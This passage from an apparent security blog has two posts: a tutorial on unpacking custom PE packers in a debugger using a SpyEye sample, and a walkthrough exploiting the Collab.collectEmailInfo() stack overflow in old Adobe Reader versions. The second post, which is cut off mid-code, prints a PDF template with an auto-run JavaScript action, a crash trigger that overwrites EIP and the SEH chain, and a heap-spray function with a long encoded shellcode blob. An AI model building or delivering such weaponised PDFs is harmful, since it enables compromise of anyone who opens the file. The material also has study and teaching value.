Custom Packers<p> </p> <p>There are several articles on internet about unpacking Packed Executables. Most demonstrate the ESP trick. This trick may not work in most packers. These days most malwares use custom packers which are created using some toolkit. You can find lot of malwares of such type like Zbot, SpyeEye, Cycbot.</p> <h4><font color="#0000ff">How PE Packers work</font></h4> <p>PE Packers compress the PE sections or some other data using some compression algorithms like LZMA ,LZSS,APLIB etc. So to before the running the actual malicious code the packer would </p> <p><strong>1)Decompress the compressed code:</strong></p> <p>To do this usually it allocates some space using VirtualAlloc(),ZwAllocateVirtualMemory().Then it will decompress the data to the allocated memory.</p> <p><strong>2)Fixes the imports:</strong></p> <p>The imports are fixed so the malware can use the imported API’s . To resolve the import addresses it will use the API’ GetProcAddress() .</p> <p><strong>3)Jump to OEP:</strong></p> <p>Finally jumps to the OEP where the the actual malware code begins. Many malwares use multilevel packers.</p> <h4><font color="#0000ff">How to Unpack:</font></h4> <p>We can set breakpoint on VirtualAlloc() first then after the breakpoint is hit we can remove the breakpoint on VirtualAlloc() and set breakpoint GetProcAddress().</p> <p>We see that GetProcAddress() would be called repetedly in the loop. This loop is used to resolve all the API’s in the dll. We bypass the loop after that continue debugging.</p> <p>After few lines of codes we will reach the OEP.</p> <h4><font color="#0000ff">DEMO:</font></h4> <p>I have taken a sample of SpyEye for the demo.</p> <p>I had set breakpoint on VirtualAlloc()</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT7O0xAlbS5KVKghQDv1WQ8p1M6ckCKjS4GKXVMdTpsQDPwO_rQqpQMqjUPXEHIZ2nTosHBTOvsp1Fd0bpHQTFfFubZuzLGNbDsE8QBz_RqaW7Q_5AoiddUQCMwufMVrKN8H-b5SfvbT9O/s1600-h/image%25255B7%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="151" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGi2o9Q_oe1u65XqFacAXbPqmelq2lN8TB6Nj_ZNozHk__mzTrY77GuBfYQOASC32rbW1V7aCuh8mWWCNV1cN2wTPYFSXFTGg-UT1lqEP7M1tstyMNn9NgFuHfK2m6Z-cmB1Z98fYireWv//?imgmax=800" width="617" border="0"></a> </p> <p>Then I set breakpoint on GetProcAddress() and break at the following</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7jqWcNEtI9cjeXAAPJHpDaxKyvF6X9LUZDOjX-_KTUsArAck7OehfH7G_2c9Reaa5f67FY4zQqUyeb3PAklNjuAcwyk5j_AswzZI6zkaTwUs-FoJeZ2DItIdyfKc5EJ0vBH_qNwn7ec3g/s1600-h/image%25255B20%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="268" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBgZsDsaIvK_pY8XjKppHSh5MnDkbVd_JwoGoA0AS_gV0bAWwUTnXWvK36MmXgOuuAGir5dSSiqURrc7Y_5smUiOqH9PtVyxvTlG5z4yxO88uvmEd3a-UKdTyydI376qgtyWcG32FeyZU//?imgmax=800" width="632" border="0"></a> </p> <p> </p> <p>We see that getProcAddress is called in loop. We bypass the loop and little below u can see a jump seems like jump to OEP.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGeuVB1dQ2-S-JQOO5fA-iCzThAfaLb3uwIfx1sSQgjbQzmN-Pyr1HT5TMJUKkEBnX1vgAsi2dPYC7kvsOMiBPZEL7UoI5y_tszL0QouHR6GpULMxJPhH6IBugNS29vWPxy33nfuspsOLT/s1600-h/image%25255B26%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="321" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzjhNorvrGoxg5A_deF58y8zqle_42gDNFDZbNbpdVDQIJbrtcx5EoHRcZaiTGbjGWIxSvdwM0MVg3qZuyDwYxNKKqSoNG6xJKcq1I0k9S_4koPPw6-dd1f1xPwcC4h_JyUokF9WM8QlwL//?imgmax=800" width="650" border="0"></a> </p> <p>I follow the jump </p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWuE2zsQlEVucVSPhzFiKBRzfW2q0bnNDyi4UCHRRKCrqQN-dhoGleUly-SGvK_pndvb_Xwn0Gij9ikzLQq3EcKrHPz8EuZWeAVuM3MXa2cbtxLYV2-004RxfUfZuV7x02G1HjsNvg8sik/s1600-h/image%25255B30%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="175" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNiP-vUBYcxuEzrfNSQjGziQqonPZTO4Pds4Hd3k9nBR4WSdV2PaEwOvo4j-g1LaU-wSZmReXknfaaX6GkON-e6bhBnzGnqCJXqzV4vJ0puOhRWjnTuZORRP2zUU4C8w2A1asUPwXO0Avw//?imgmax=800" width="662" border="0"></a> </p> <p> </p> <p>This is another layer of packer .</p> <p>The trick applies to most packers. May not work in case packers combined with protectors like asprotect. </p> <p> Feel free to comment</p> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com4tag:blogger.com,1999:blog-9205939188428310956.post-65153847126603764152011-07-15T08:45:00.001-07:002011-07-16T04:46:49.075-07:00Heap Spraying Adobe: exploiting collab.collectemailinfo()<p> </p> <p><strong><font color="#008080" size="3">Heap Spray Concept</font></strong>: </p> <p>First of all I would like readers to know that heap spray not a vulnerability like heap </p> <p>overflow but it a technique used to exploit vulnerabilities. It is basically used to exploit browsers,pdf reader where embedded languages like javascript comes into play.</p> <p>The reason is javascript variables are created in the heap rather than stack variables.</p> <p>generally we create a large of javascript variables say using arrays</p> <p>array = new array()</p> <p>nops = %u9090%u9090………….%u9090;</p> <p>shellcode=%u6565%u………………;</p> <p>arrar[1] = nop + shellcode;</p> <p>arry[2] = nop + shellcode;</p> <p>arr[300] = nop + shellcode;</p> <p>This fills the heap area with a combination of nops and shellcode. Usually heap resides in higher memory area like 0x0a0a0a0a …0x0c0c0c0c. We try to fill these address with the combination of nops and shellcode and later we redirect the flow to these address so that our shellcode gets executed.</p> <p>Enough of theory lets move on to practical implementation.</p> <p>I have tried the exploit with adobe 8.1.1 and older. A stack overflow bug exists in Collab.collectEmailInfo() in adobe. Exploitation involves spraying the heap then overwriting the EIP with heap address 0x0a0a0a0a</p> <p><strong><font color="#008080" size="3">Lets start:</font></strong></p> <p><font color="#000000" size="2">I created a PDF template using <em>Didier Stevens</em> tools</font></p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 498px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 208px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">%PDF-1.1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">1 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Catalog<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Outlines 2 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Pages 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /OpenAction 7 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">2 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Type /Outlines<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">3 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Pages<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Kids [4 0 R]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Count 1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">4 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Page<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Parent 3 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /MediaBox [0 0 612 792]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Contents 5 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Resources <<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /ProcSet [/PDF /Text]<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Font << /F1 6 0 R >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">5 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><< /Length 56 >><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">stream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endstream<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">6 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Font<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Subtype /Type1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Name /F1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /BaseFont /Helvetica<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Encoding /MacRomanEncoding<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7 0 obj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Type /Action<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /S /JavaScript<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /JS (<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000">ss</span>",msg: "<span style="color: #8b0000">hi</span>"});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">xref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000000 65535 f<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000012 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000109 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000165 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000234 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000439 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000553 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000677 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">trailer<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Size 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Root 1 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">startxref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">784<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">%%EOF<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre></pre><br /><p><strong>Code List 1</strong></p><br /><p>You can put any javascript code in the </p><pre><pre> /JS () in the above code and execute javascript.</pre><pre> </pre><pre>The following code overflows the stack</pre><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 507px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 101px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> crsh = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u1212</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">while</span> (crsh.<span style="color: #0000ff">length</span> < 0x2000)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">if</span> (app.viewerVersion >= 6.0)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000"></span>",msg: crsh});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> }</pre></pre></pre><pre><strong>Code List 2</strong></pre><pre>Place the code in /JS () Code List 1</pre><pre>Then open adobe reader in ollydbg and run it. Then open the above pdf in adobe.If there is exception in ollydbg then press</pre><pre>shift+f9 till the eip gets overwritten</pre><pre><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHAnnm0vDf2i1VZIQGODbxGPKdUyBQZjaSC1-03kfbyWgX7Lq3fNQioenuP24MzxdtxVefGBbXQ-ak-2zNLVvAJwIIOmkRQwJFaTiySdAgzvFz48SOhU7vMOOfpGRR4EFi9iNzLiucMu9Q/s1600-h/image%25255B3%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="109" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5sq7TtQjoHCKVmhs4CvNoIbrZ8GZ3UpX1oJt5lLmdFVu0Nd1XJyQ-oaskQz7lsO_c3PtQHB7XscpIi2vB4-A6RK2LR6Kin16VyY1zkwdFXzj4zXH-to3VmUBugRH77vGSWen4NOv_f_Mc//?imgmax=800" width="509" border="0"></a> </pre><pre>Also go to view SEH chain in ollydbg->view->SEH chain</pre><pre><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7K9jzg2twqJy_MqZPwJfSftvMEqX5u9yBZtrFrtXbH9UuM-nZiZbxImZ5c1FMqL_G2lpMHlvBecayu5k5rb1J2T4de0mS7tKX9PO2X-oEdTZV1PnyRUPjXoouTd8uQfEqO_Ha0lEP7KJr/s1600-h/image%25255B10%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="324" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkOuVx_n4JptcTqievHVSXlAFT0TV2hBEIsmRTX0WDZKq3IfX9wQ4lX5d0SKpKJIcSBlE9t7Bac28GlUX8vkiZ7bLyl_YPAT_k-uLbXdDIunjO0Ts07R_UjGVsDQo8I3Jzr0jmaPWAWea_//?imgmax=800" width="400" border="0"></a> </pre><pre>So we see the SEH chain gets overwritten</pre><pre>Now lets create the exploit code.</pre><pre>Following code is use to spray the heap with shellcode and nops.</pre><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 512px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 169px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">function</span> HeapSpray()<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">{<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">Array</span>2 = <span style="color: #0000ff">new</span> <span style="color: #0000ff">Array</span>();<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">var</span> Shellcode = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u3c73%u343f%u3514%u2a1c%ud6d2%ub624%u2c7c%ud538%ub8b5%uf533%u7e37%u7925%ue031%u9027%u19b2%u4be2%u4078%u097b%u71f8%u9948%ubf8d%u1d9f%u4315%u767d%u752d%u494e%u98b0%u727f%u7a76%ub30c%u8392%ue2d1%u3d7c%u91b9%u2270%u2ffc%ub2a8%u2c92%u4796%ua90d%u357b%ub49f%u98b0%u04b3%uf539%u46b8%uf929%u7d4f%u7315%ubf66%u778d%ub54a%u417e%ue319%u0243%ubbd5%ueb31%u781c%u9325%ube42%u9990%u2405%u103c%ud4d0%ufd84%u1879%u2be1%u74f8%u0827%u40d6%ub72d%ue009%u491d%u3771%u3fb1%u6748%u7534%ub64e%u9b0c%u3dba%u147c%u8797%ue1f7%u8c4b%u0ce2%u808d%u66f9%u404a%u2f3d%ue311%u277a%u2442%u38bf%u93fd%u25b4%u491c%u0191%u1df8%u9747%u4f71%u9048%u7e35%ub54e%u4bb8%u99b0%ud603%u373c%u78b2%u702c%ua843%u04b1%u85b6%u7deb%ufc6b%u7bb9%u6773%ub3a9%u7672%ube0d%u4115%u0534%u7492%uf512%ud50a%u7f79%u2175%u2de0%u9b9f%uff83%uc0c7%u77d4%u3f46%uba96%u98b7%u14bb%uba24%u7d2f%u4377%u7690%ubf3d%u728d%ufd30%u49b4%ub266%u89bb%ue2d2%u2570%ub09f%u3c78%ub840%u4e27%ue01a%u3746%ub12d%u4297%uf988%u7b04%u3579%u3275%uc6fe%ue3c1%uf869%u2873%u47eb%u4b7f%ub998%u3414%u9691%uf523%ufc13%u7a93%u9967%ud620%u051d%u74a8%u2271%u4ad4%u15a9%u484f%ud51b%u3fbe%ub6b3%u0cb7%ue181%u922c%u0d9b%u1c7c%u7eb5%u7341%u667a%u70be%u7974%u757b%ub737%ud33a%u9ff9%ub62f%u2598%u4034%u9067%u777f%uf60b%u1de3%u3993%u4ae2%u422d%u1571%u247e%u4792%ub5a8%u3fb0%u7d0c%ud62a%u86b1%ue0f7%u8d4f%ua943%u761c%u4e0d%u05bb%u3327%u46f5%u3d9b%u3c35%u3b72%u04f8%uf621%u4bd4%u41b8%u7897%ufd22%u9114%u7cb9%ufc03%ud186%u20eb%u49e1%ub3bf%u9699%u2cb4%u48b2%ud533%u7bba%u8366%u72e3%u7014%ud069%u98d4%u963c%u3f74%u7877%u737a%u8d49%u1941%u71e1%u0105%ub2f8%u4f4a%u0d7c%ud30a%u79eb%uf52b%u34b5%ube43%u97b7%u1c04%ub990%u2c35%u819f%uf9c1%u6b48%u93fc%u3775%u0c2f%ua9b3%u272d%u91ba%u7da8%u9225%u994e%ud584%ubb46%u761d%ub115%u1a7f%u42e0%ub647%u9bb8%ud631%u243d%ufd0b%ub0bf%ue211%ub467%u7e4b%u7c7b%u7e78%u7477%u9740%u109b%u05e3%ub13c%u85bb%u47d5%u6670%ub741%uf829%u3a72%u71eb%u2f7a%u7d46%u4875%u7fb9%u1d04%u894f%u37e0%u93b5%u7973%ufc3b%ub64e%u9298%u9f3f%ua9a8%ufd08%u1cbf%u144a%u340c%u322c%u2de1%ub296%uba67%u4976%uf502%u25be%u4b40%ue280%u9943%u7bb3%ue030%ub027%ub4b8%u7691%u7015%u7942%ud638%u3974%u35eb%ue288%u7c24%ud412%ud287%u0de3%u3d77%u908d%u1b71%u7ef9%uf528%u9966%u3c73%u922c%u2a72%u0df9%u4a4f%ud523%u187f%u7afd%u0935%u2fe1%ubb47%u48be%ub2b6%u7d91%u7805%ud413%ub8b0%u1475%u438d%u9634%u044b%u970c%u8cb9%u25d6%u1d90%u931c%u27ba%ub3bf%ua846%u24a9%uc041%u40f8%u153d%u4e42%ub49f%ub5b7%ufc3f%u492d%ub167%u9b98%uda37%ubace%ufdc9%u156d%u74d9%uf424%u2b58%ub1c9%u3133%u1750%u5003%u8317%uf909%ue08f%uea75%u0bd9%ueb85%u82b9%uda60%uf1eb%u4fe1%u713c%u63a7%ud7b7%uf753%uffb5%ub054%u2670%u415b%ue6b5%u8137%u9ad7%ud645%ua237%u2b86%ue339%uc4fa%ubc6b%u7671%uc99c%u4bc7%u1d9d%uf34c%u18e5%u8092%u225f%u39c2%u6ceb%u32fa%u4cb3%u97fb%ub1a7%u9cb2%u411c%u7545%uaa6d%ub974%u9522%u34b9%ud13a%ua77d%u2949%u5a7e%uea4a%u80fd%uefdf%u43a5%ud447%u8754%u9f1e%u6c5a%uc754%u737e%u73b9%uf87a%u543c%uba0b%u701a%u1850%u2102%ucf3c%u313b%ub098%u3999%ua40a%u6398%u3b40%u1e28%u3b2d%u2132%u541d%uaa03%u23f2%u799c%udcb7%u20d6%u7491%ub0bf%u18a0%u6f40%u24e6%u9ac3%ud296%ueedb%u9f93%u025b%ub0e9%u2409%ub05e%u471b%u2201%ua6c7%uc2a4%ub762</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> SprayValue = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u9090%u9090</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">do</span>{SprayValue +=SprayValue}<span style="color: #0000ff">while</span>(SprayValue.<span style="color: #0000ff">length</span> < 800000/2);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">for</span>(j=0;j<200;j++) <span style="color: #0000ff">Array</span>2[j]=SprayValue+Shellcode;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 